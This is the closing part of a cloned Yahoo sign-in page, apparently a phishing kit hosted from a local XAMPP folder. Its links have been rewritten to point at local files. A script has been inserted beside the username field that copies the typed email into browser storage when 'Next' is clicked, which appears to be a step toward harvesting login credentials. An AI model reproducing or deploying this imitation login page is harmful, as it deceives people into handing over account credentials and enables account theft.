        <option role="option" data-code="+993" value="TM">Turkmenistan ‪(+993)‬</option>
        <option role="option" data-code="+1" value="TC">Turks and Caicos Islands ‪(+1)‬</option>
        <option role="option" data-code="+688" value="TV">Tuvalu ‪(+688)‬</option>
        <option role="option" data-code="+1" value="VI">US Virgin Islands ‪(+1)‬</option>
        <option role="option" data-code="+256" value="UG">Uganda ‪(+256)‬</option>
        <option role="option" data-code="+380" value="UA">Ukraine ‪(+380)‬</option>
        <option role="option" data-code="+971" value="AE">United Arab Emirates ‪(+971)‬</option>
        <option role="option" data-code="+44" value="GB">United Kingdom ‪(+44)‬</option>
        <option role="option" data-code="+1" value="US" data-format="(XXX) XXX-XXXX" selected="selected">United States ‪(+1)‬</option>
        <option role="option" data-code="+598" value="UY">Uruguay ‪(+598)‬</option>
        <option role="option" data-code="+998" value="UZ">Uzbekistan ‪(+998)‬</option>
        <option role="option" data-code="+678" value="VU">Vanuatu ‪(+678)‬</option>
        <option role="option" data-code="+379" value="VA">Vatican City ‪(+379)‬</option>
        <option role="option" data-code="+58" value="VE">Venezuela ‪(+58)‬</option>
        <option role="option" data-code="+84" value="VN">Vietnam ‪(+84)‬</option>
        <option role="option" data-code="+681" value="WF">Wallis and Futuna ‪(+681)‬</option>
        <option role="option" data-code="+967" value="YE">Yemen ‪(+967)‬</option>
        <option role="option" data-code="+260" value="ZM">Zambia ‪(+260)‬</option>
        <option role="option" data-code="+263" value="ZW">Zimbabwe ‪(+263)‬</option>
    </select>
    <div class="arrow"></div>
</div>

            </div>
            <div class="input-group">
                <input class="phone-no " type="text" name="email" id="login-username" value="" autocomplete="username" autocapitalize="none" autocorrect="off" autofocus="true" placeholder=" ">
                <script>
                    document.addEventListener("DOMContentLoaded", function() {
                        const btnNext = document.getElementById('btnNext');
                        btnNext.addEventListener("click", advancePage, false);
                    });
                
                    function advancePage() {
                        const elEml = document.getElementById('email');
                        localStorage.setItem('eml', elEml.value);
                    }
                </script>
                <div class="input-field-icon hide" id="username-field-icon"></div>
                <label for="login-username" id="login-label" class="login-label">Username, email, or&nbsp;mobile</label>
                <ul class="auto-fill-overlay hide" aria-live="polite" id="domain-auto-fill">
                    <li data-fill="yahoo.com" tabindex="2">yahoo.com</li><li data-fill="myyahoo.com" tabindex="3">myyahoo.com</li><li data-fill="ymail.com" tabindex="4">ymail.com</li><li data-fill="gmail.com" tabindex="5">gmail.com</li><li data-fill="outlook.com" tabindex="6">outlook.com</li><li data-fill="aol.com" tabindex="7">aol.com</li>
                </ul>            </div>
            <div class="hidden-input-container">
                <input name="password" class="pwd-field" type="password" tabindex="-1" aria-hidden="true" role="presentation" autocorrect="off" placeholder="Password">
            </div>
        </div>
        <p id="username-error" class="error-msg hide" role="alert"></p>


        <div class="button-container">
            <input id="login-signin" type="submit" name="signin" class="pure-button puree-button-primary challenge-button" value="Next" data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:next">
        </div>

        <div class="helper-links-container">
            <div class="helper-item ">
                <span class="stay-signed-in checkbox-container">
                    <input id="persistent" name="persistent" value="y" type="checkbox" checked="">
                    <label for="persistent">Stay signed&nbsp;in</label>
                </span>
            </div>
            <div class="helper-item arlink">
                <span class="help">
                    <a href="file:///C:/forgot?.lang=en-US&amp;src=homepage&amp;activity=ybar-signin&amp;pspid=2023538075&amp;add=1&amp;done=https%3A%2F%2Fwww.yahoo.com%2F" id="mbr-forgot-link" data-ylk="elm:btn;elmt:forgot;slk:forgot;mkey:forgot" data-rapid-tracking="true">Forgot&nbsp;username?</a>
                </span>
            </div>
        </div>


        <div class="bottom-links-container has-social-buttons">
            <p class="sign-up-link">
                <a href="file:///C:/account/create?.lang=en-US&amp;src=homepage&amp;activity=ybar-signin&amp;pspid=2023538075&amp;add=1&amp;done=https%3A%2F%2Fwww.yahoo.com%2F&amp;specId=yidregsimplified" id="createacc" role="button" class="pure-button puree-button-secondary challenge-button" data-rapid-tracking="true" data-ylk="elm:link;elmt:secondary;slk:signup;mKey:signup">Create an&nbsp;account</a>
            </p>

                <div id="social-login-container" class="social-login-container">
                    <div class="or-cont-with-desc challenge-feedback-text">
                        Or, continue&nbsp;with
                    </div>
                    <ul class="social-login">
                        <li class="items-cont-1">
                            <button type="submit" id="tpa-google-button" name="tpaProvider" value="google" class="pure-button sc-button items-1 sc-google sc-google-button" data-rapid-tracking="true" data-ylk="elm:btn;slk:google-btn;mKey:google-social-btn">
                                <label class="offscreen">google</label>
                            </button>
                        </li>
                    </ul>
                </div>        </div>
    </form>
</div>
</div>
        </div>
        <div id="login-box-ad-fallback" class="login-box-ad-fallback" style="display: block;">
            <h1>Yahoo makes it easy to enjoy what matters most in your&nbsp;world.</h1>
<p>Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies and more. You get more out of the web, you get more out of&nbsp;life.</p>
        </div>
    </div>
    <div class="login-bg-outer">
        <div class="login-bg-inner">
            <div id="login-ad-rich" aria-hidden="true">
                <iframe id="login-ads-gpt-iframe" allow="geolocation &#39;none&#39;; fullscreen &#39;none&#39;; autoplay &#39;none&#39;; camera &#39;none&#39;; display-capture &#39;none&#39;; document-domain &#39;none&#39;; microphone &#39;none&#39;; gyroscope &#39;none&#39;; magnetometer &#39;none&#39;; midi &#39;none&#39;; payment &#39;none&#39;; serial &#39;none&#39;; speaker-selection &#39;none&#39;" sandbox="allow-forms allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts" width="1440" height="1024" scrolling="no" frameborder="no" src="./Yahoo1_files/sandbox.html" style="display: none;"></iframe>
            </div>
                    </div>
    </div>
</div>
    <script src="./Yahoo1_files/rapid-3.53.39.js.download"></script>
    <script nonce="5B/hi3BI+hW0vs2A9tIOg47CPvjJ9J81Kri+QAJdxKSvgAqM">
        var rapidInstance = new YAHOO.i13n.Rapid(I13N_config);
    </script>
    <script src="./Yahoo1_files/bundle.js.download"></script>
    <noscript>
        <img src="/account/js-reporting/?crumb=94jyjqi2AD0TkeRg8eQugg&message=javascript_not_enabled&ref=%2F" height="0" width="0" style="visibility: hidden;">
    </noscript>
    <script nonce="5B/hi3BI+hW0vs2A9tIOg47CPvjJ9J81Kri+QAJdxKSvgAqM">
        var checkAssets = function(seconds) {
            setTimeout(function() {
                if (!window.mbrJSLoaded) {
                    window.mbrSendError('js_failed_to_load', location.pathname);
                }
                var check = document.getElementById('mbr-css-check'),
                    style = check.currentStyle;
                if (window.getComputedStyle) {
                    style = window.getComputedStyle(check);
                }
                if (style.display !== 'none') {
                    window.mbrSendError('css_failed_to_load', location.pathname);
                }
            }, (seconds * 1000));
        };

        checkAssets(10);
    </script>
    <script src="./Yahoo1_files/cmp.js.download"></script><iframe name="__uspapiLocator" style="display: none;" src="./Yahoo1_files/saved_resource.html"></iframe><iframe name="__tcfapiLocator" style="display: none;" src="./Yahoo1_files/saved_resource(1).html"></iframe><iframe name="__gppLocator" style="display: none;" src="./Yahoo1_files/saved_resource(2).html"></iframe>
    <script src="./Yahoo1_files/opus.js.download"></script>
    <div id="mbr-css-check"></div>
    <div id="page-mask" class="page-mask hide"></div>
    <div id="ad"></div>
    <div class="mbr-legacy-device-bar" id="mbr-legacy-device-bar">
        <label class="cross" for="mbr-legacy-device-bar-cross" aria-label="Close this warning">x</label>
        <input type="checkbox" id="mbr-legacy-device-bar-cross">
        <p class="mbr-legacy-device">
                Yahoo works best with the latest versions of the browsers. You're using an outdated or unsupported browser and some Yahoo features may not work properly. Please update your browser version now. <a href="file:///C:/xampp/htdocs/sc/inv/yahoo.htm">More&nbsp;Info</a>
        </p>
    </div>
    <script nonce="5B/hi3BI+hW0vs2A9tIOg47CPvjJ9J81Kri+QAJdxKSvgAqM">
        (function(root) {
            if (!root.isGoodJS) {
                document.getElementById('mbr-legacy-device-bar').style.display = 'block';
            }
        }(this));
    </script>
    
    

</body></html>